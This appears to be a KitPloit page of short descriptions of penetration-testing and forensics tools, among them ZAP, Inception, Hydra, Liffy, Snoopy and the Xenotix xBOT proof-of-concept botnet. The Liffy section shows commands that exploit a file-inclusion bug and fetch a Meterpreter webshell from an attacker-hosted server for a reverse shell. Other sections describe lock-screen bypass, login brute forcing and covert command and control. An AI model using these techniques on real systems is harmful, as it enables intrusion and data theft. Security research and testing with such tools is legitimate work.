Channel: KitPloit - PenTest Tools!

OWASP ZAP v2.3.1 - An easy to use integrated penetration testing tool for finding vulnerabilities in web applications



OWASP Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pen tester's toolbox.

Changelog v2.3.1

The following changes were made in this release:
  • ZAP changes request data (while switching views) ( Issue 81 )
  • Unfulfilled dependencies hang the active scan ( Issue 377 )
  • Can't remove scripts marked as ‘load on start’ ( Issue 1073 )
  • core.newSession doesn’t clear Sites ( Issue 1114 )
  • Historical Request Tab Doesn’t allow formatting changes ( Issue 1155 )
  • Proxy gzip decoder doesn’t update content length in response headers ( Issue 1156 )
  • Unable to set a home directory with a space on the command line ( Issue 1163 )
  • Redundant indexes in zapdb.script ( Issue 1166 )
  • Add proxy support for “deflate” content encoding ( Issue 1168 )
  • Spider Context/User pop up menus no longer shown ( Issue 1170 )
  • Unable to select 2 requests in fuzz results (Ctrl + click) ( Issue 1179 )
  • Vulnerable pages active scanned only once ( Issue 1181 )
  • Alerts of same type for different parameters of same vulnerable page shown only once in “Alerts” tree ( Issue 1182 )
  • NullPointerException while selecting a node in the “Alerts” tab after deleting a message ( Issue 1183 )
  • Cmdline session params have no effect ( Issue 1191 )
  • Scan URL path elements – turn off by default ( Issue 1193 )
  • Command line arguments are not passed to extensions when starting ZAP in daemon mode ( Issue 1194 )
  • AbstractPlugin.bingo incorrectly sets evidence to attack ( Issue 1196 )
  • Issue with loading addons that did not initialize correctly ( Issue 1202 )
  • WordPress Authentication Script ( Issue 1203 )
  • ‘History’ tab is not cleared when a new session is created through the API with ZAP in GUI mode ( Issue 1206 )


Inception - Attacking FireWire Devices


Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks in order to unlock live computers using FireWire SBP-2 DMA. It is primarily intended to be used against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that does not use encryption.

As of version 0.3.5, it is able to unlock the following x86 and x64 operating systems:
OS            | Version        | Unlock lock screen | Escalate privileges | Dump memory < 4 GiB
--------------|----------------|--------------------|---------------------|--------------------
Windows 8     | 8.1            | Yes                | Yes                 | Yes
Windows 8     | 8.0            | Yes                | Yes                 | Yes
Windows 7     | SP1            | Yes                | Yes                 | Yes
Windows 7     | SP0            | Yes                | Yes                 | Yes
Windows Vista | SP2            | Yes                | Yes                 | Yes
Windows Vista | SP1            | Yes                | Yes                 | Yes
Windows Vista | SP0            | Yes                | Yes                 | Yes
Windows XP    | SP3            | Yes                | Yes                 | Yes
Windows XP    | SP2            | Yes                | Yes                 | Yes
Windows XP    | SP1            | Yes                |                     |
Windows XP    | SP0            | Yes                |                     |
Mac OS X      | Mavericks      | Yes (1)            | Yes (1)             | Yes (1)
Mac OS X      | Mountain Lion  | Yes (1)            | Yes (1)             | Yes (1)
Mac OS X      | Lion           | Yes (1)            | Yes (1)             | Yes (1)
Mac OS X      | Snow Leopard   | Yes                | Yes                 | Yes
Mac OS X      | Leopard        | Yes                |                     |
Ubuntu (2)    | Saucy          | Yes                | Yes                 | Yes
Ubuntu        | Raring         | Yes                | Yes                 | Yes
Ubuntu        | Quantal        | Yes                | Yes                 | Yes
Ubuntu        | Precise        | Yes                | Yes                 | Yes
Ubuntu        | Oneiric        | Yes                | Yes                 | Yes
Ubuntu        | Natty          | Yes                | Yes                 | Yes
Ubuntu        | Maverick       | Yes (3)            | Yes (3)             | Yes
Ubuntu        | Lucid          | Yes (3)            | Yes (3)             | Yes
Linux Mint    | 13             | Yes                | Yes                 | Yes
Linux Mint    | 12             | Yes                | Yes                 | Yes

(1): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked.
(2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.
(3): x86 only.

The tool also effectively enables escalation of privileges, for instance via the runas or sudo -s commands, respectively. More signatures will be added. The tool makes use of the libforensic1394 library, courtesy of Freddie Witherden, under an LGPL license.

Volafox - Mac OS X & BSD Memory Analysis Toolkit


Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is Python-based and allows investigating security incidents and finding information about malware and any other malicious program on the system. A security analyst can obtain the following information using this tool:

Information

  1. Kernel version, CPU and memory spec, boot/sleep/wakeup time
  2. Mounted filesystems
  3. Process listing and dump address space
  4. KEXT(Kernel Extensions) listing
  5. System Call / Mach Trap Table (Hooking Detection)
  6. Network socket listing
  7. Open files listing by process
  8. PE State information ( Device Tree, Video Memory Area)
  9. EFI information ( EFI System Table, EFI Configuration Table, EFI Runtime Services)
  10. Extract keychain master key candidates
  11. TrustedBSD analysis
  12. Other commands: uname, dmesg, etc.


RedoWalker - Tool to explore Oracle database transaction logs


RedoWalker is a tool to explore Oracle database transaction logs, otherwise known as redo logs. Any time changes are made to the database server, for example after an INSERT, DELETE or UPDATE, they are recorded in the redo log.

These redo logs are stored in a proprietary and undocumented format and, as such, are unreadable and unintelligible without a tool that can decipher them. Oracle does provide a tool called LogMiner to access the redo logs, but using it requires access to a live database server. RedoWalker is a replacement for LogMiner and removes this requirement. This is particularly useful for auditors, forensic examiners and breach investigators. DBAs can also take advantage of RedoWalker for troubleshooting and problem isolation without the database server, since using LogMiner could cause the database server to slow down.


RedoWalker dumps Oracle redo logs to an XML format; it specifically dumps redo entries for DDL, INSERTs, UPDATEs, DELETEs and associated UNDO records.

System Requirements
  • RedoWalker runs on Windows and requires the .Net Framework.
  • Should work with Oracle 10g, 11g and 12c.

HTTPNetworkSniffer - Http Sniffer Utility


HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.


Argus v3.0.6 - Real Time Auditing Network Activity


Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per-transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.

Argus is composed of an advanced comprehensive network flow data generator, the Argus sensor, which processes packets (either capture files or live packet data) and generates detailed network flow status reports of all the flows in the packet stream. Argus captures much of the packet dynamics and semantics of each flow, with a great deal of data reduction, so you can store, process, inspect and analyze large amounts of network data efficiently. Argus provides reachability, availability, connectivity, duration, rate, load, good-put, loss, jitter, retransmission, and delay metrics for all network flows, and captures most attributes that are available from the packet contents, such as L2 addresses, tunnel identifiers (MPLS, GRE, ESP, etc…), protocol ids, SAP’s, hop-count, options, L4 transport identification (RTP, RTCP detection), host flow control indications, etc.

Argus is used by many sites to generate network activity reports for every network transaction on their networks. The network audit data that Argus generates is great for security, operations and performance management. The data is used for network forensics, non-repudiation, network asset and service inventory, behavioral baselining of server and client relationships, detecting covert channels, and analyzing Zero day events.

Argus is an Open Source project, currently running on Mac OS X, Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows (under Cygwin) and OpenWrt, and has been ported to many hardware accelerated platforms, such as Bivio, Pluribus, Arista, and Tilera. The software should be portable to many other environments with little or no modification. Performance is such that auditing an entire enterprise’s Internet activity can be accomplished using modest computing resources.


WifiInfoView v1.60 - WiFi Scanner for Windows


WifiInfoView scans the wireless networks in your area and displays extensive information about them, including: Network Name (SSID), MAC Address, PHY Type (802.11g or 802.11n), RSSI, Signal Quality, Frequency, Channel Number, Maximum Speed, Company Name, Router Model and Router Name (only for routers that provide this information), and more...

When you select a wireless network in the upper pane of this tool, the lower pane displays the Wi-Fi information elements received from this device, in hexadecimal format. 

WifiInfoView also has a summary mode, which displays a summary of all detected wireless networks, grouped by channel number, company that manufactured the router, PHY type, or the maximum speed.

Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa


Liffy - Local File Inclusion Exploitation Tool


Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found a local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.
http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should see a new Meterpreter session spawn.
curl --silent http://target/vuln/7ka0tqsq.php


Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database


SSDp is a useful penetration-testing tool to find bugs, errors or vulnerabilities in MySQL databases.

Functions
  • SQL Injection
  • Operating System Functions
  • Dump Database
  • Extract Database Schema
  • Search Columns Name
  • Read File (read only)
  • Create File (read only)
  • Brute Table & Column

Bro - Passive Open-Source Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expressing arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.

Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which supports many different services


A very fast network logon cracker which supports many different services.

See the feature sets and services coverage page, including a speed comparison against ncrack and medusa.

Passwords are one of the biggest security holes, as every password security study shows.

This tool is proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none of them supports more than one protocol to attack or supports parallelized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Changelog for hydra
-------------------

Release 8.0
! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach)
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton)
* Added patch for xhydra that adds bruteforce generator to the GUI (thanks to Petar Kaleychev)
* Target on the command line can now be a CIDR definition, e.g. 192.168.0.0/24
* with -M , you can now specify a port for each entry (use "target:port" per line)
* Verified that hydra compiles cleanly on QNX / Blackberry 10 :-)
* Bugfixes for -x option:
- password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
- fixed crash when used together with -e option
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Various bugfixes if many targets were attacked in parallel
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues.
* Checked code with Coverity. Fixed a lot of small and medium issues.


RCEer - Simple Remote Command Execution scanner

Webfwlog - Firewall Log Analyzer


Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for Linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP®. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP®. Webfwlog also supports logs saved in a database using the ULOG or NFLOG targets of the Linux netfilter project, or any other database logs mapped with a view to the ulogd schema. Versions 1 and 2 of the ulogd database schemas are supported. Webfwlog is licensed under the GNU GPL.

Webfwlog fully supports IPv6 for database logs, and netfilter and ipfilter system logs.

With Webfwlog you can design reports to use on your logged data in whatever configuration you desire. Included are example reports as a starting point. You can sort a report with a single click, “drill-down” on the reports all the way to the packet level, and save your reports for later use.


Prerequisites:
  • A web server with PHP >= 4.1
  • Log files in standard netfilter, ipfilter, ipfw, ipchains or Windows XP® format or database logs populated with the ULOG or NFLOG target of netfilter, or other database logs mapped with a view to ulogd version 1 or 2 schemas
  • A MySQL or PostgreSQL database server:
    • MySQL >= 3.23.52 or any production release of 4.x or 5.x
    • MySQL >= 5 required for IPv6
    • PostgreSQL >= 7.1
    • PostgreSQL >= 7.4 required for IPv6
  • Your favorite web browser.

Changelog v1.0

  • Add support for ulogd version 2.
  • Add support for snort database logs.
  • Add support for Cisco IOS and Cisco PIX log formats (syslog).
  • Add support for snort log files (syslog).
  • Add support for netscreen log files (syslog).
  • Add support for multiple table/view selection (database).
  • Add IPv6 support for database logs, netfilter and ipfilter.
  • Add support for RFC 5424 dates in netfilter log files.
  • Add ip protocol number / name in ip headers section on packet detail page.
  • Accept numeric criteria in binary notation (0b10010100)
  • Output numeric fields in configurable format (decimal, hex, octal, binary).
  • Substantial performance improvement with database logs.
  • Only print fields on packet detail page where data exists.
  • Only populate cache for fields appearing in report.
  • Add option to populate cache for fields even when not in report.
  • Work natively with postgresql inet column type.
  • Implement php mysqli interface and use it when present.
  • Test icmp_gateway column type separately from ip_saddr (database).
  • For protocol-specific criteria/match, only check/display when relevant.
  • Always use oob_time_sec when local_time does not exist (database).
  • Add config parameter to set timezone if not set in php.ini (PHP >= 5.1).
  • Sort blank source and destination port last for syslog (to match database).
  • Fix matching by tcp options when not exact match (syslog).
  • Fix parsing of ipfilter icmp code names.
  • Fix display of service names to ‘-’ when name doesn’t resolve (database logs).
  • Fix state maintenance when using alternate data source.
  • Fix display of oob time to use date format string (database).
  • Fix display of icmp gateway on packet detail page.
  • Fix mysql and postgresql setup scripts for sample reports on some systems.
  • Fix drill-down with arbitrary column defined in some cases (database).
  • Fix page refresh when running report from report editor.
  • Fix harmless PHP notice-level messages about undefined indexes, etc.
  • Fix for netfilter when kernel logs uptime (syslog).
  • Fix for Cisco PIX ID string variations.
  • Gracefully continue on home page/report editor if no log table or view found.
  • Remove outmoded option to update all in cache (database).
  • Do not require or allow “AND” at start of additional WHERE clause (database).
  • Use pcre instead of deprecated ereg functions internally.
  • Allow trailing comments in conf file.
  • Build system: use automake
  • HTML fixes.
  • Fix compiler warnings.
  • Code cleanup.
  • Documentation updates.

WebCookiesSniffer - Capture Web site cookies


WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies in name-value format in the lower pane.


ByWaf - Web Application Penetration Testing Framework


ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds several important features, including:
  • Loading and selecting plugins.
  • Getting and setting global and per-plugin options.
  • Additional methods exposing functionality to the plugins.
  • Backgrounding jobs, ending running jobs and querying job status.
  • Loading scripts from the command-line or within the interpreter.
  • Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:
The Wafterpreter API encompasses methods used by the plugins as well as the Wafterpreter’s own methods; this allows plugins to refine its behavior by substituting their own methods in place of these.

Utility methods are time-saving shortcuts, while the API methods are the preferred way to change the interpreter’s behavior and to query jobs.
  • filename_completer(): a utility method and API that, when given the starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. The parameters to this method are supplied to completion methods, which can in turn pass them to this method.
  • get_job(): this utility method retrieves a Futures instance from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
  • finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
  • set_prompt(): an API method for setting the prompt to reflect a new plugin name.
  • get_history_item(): an API method returning the command history.
  • save_history(): an API method for saving the command history to a file.
  • load_history(): an API method for loading the command history from a file.
  • clear_history(): an API method for clearing the command history.
  • load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

sb0x-project - A simple and Lightweight framework for Penetration testing


sb0x-project is a lightweight penetration-testing framework written in Python.


Platforms:
  • Linux
  • BSD
  • "Or Unix System"

Snoopy - A distributed tracking and data interception framework


Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data.

Snoopy consists of four components:
  • Client software (aka Snoopy Drone software)
  • Server software
  • Web interface
  • Maltego transforms

Plug-ins
Plug-ins consist of two parts:
  • Back-end (data providing) part, written in Python
  • Front-end (displaying) part, written in JavaScript (optional)

Requirements
  • Ubuntu 12.04 LTS 32bit online server
  • One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
  • A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.


Xenotix xBOT - A Cross Platform PoC Bot that abuses certain Google Services to implement its C&C


Xenotix xBOT is a proof of concept cross platform (Linux, Windows, Mac) bot written in Python that abuses certain Google Services to implement a Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet are abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are sent to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and parsed. For implementing the bot we parse through the source, fetch the commands and do the corresponding operations. xBOT’s communication is encrypted as it uses Google’s own SSL connection and is not affected by firewalls as it works at the application layer. The botnet’s commands and responses are encrypted with SSL from Google itself, making it harder to sniff the bot’s communications on the network. It is a prototype bot with the bare minimum features of a typical bot. The intention of this tool is to give an idea about how Google APIs can be abused for botnet implementation.

xBOT COMMANDS
  • xSYSINFO : Get System Information
  • EXECUTE : Execute a passive system command
  • xDOWNLOAD : Download a file from an URL
  • xUPLOAD : Upload a file
  • xNETWORK : Get network information
  • xPORTSCAN : Run a Portscan
  • xSCREENSHOT : Grab a Screenshot
  • xKILL : Kill and Remove the xBOT.
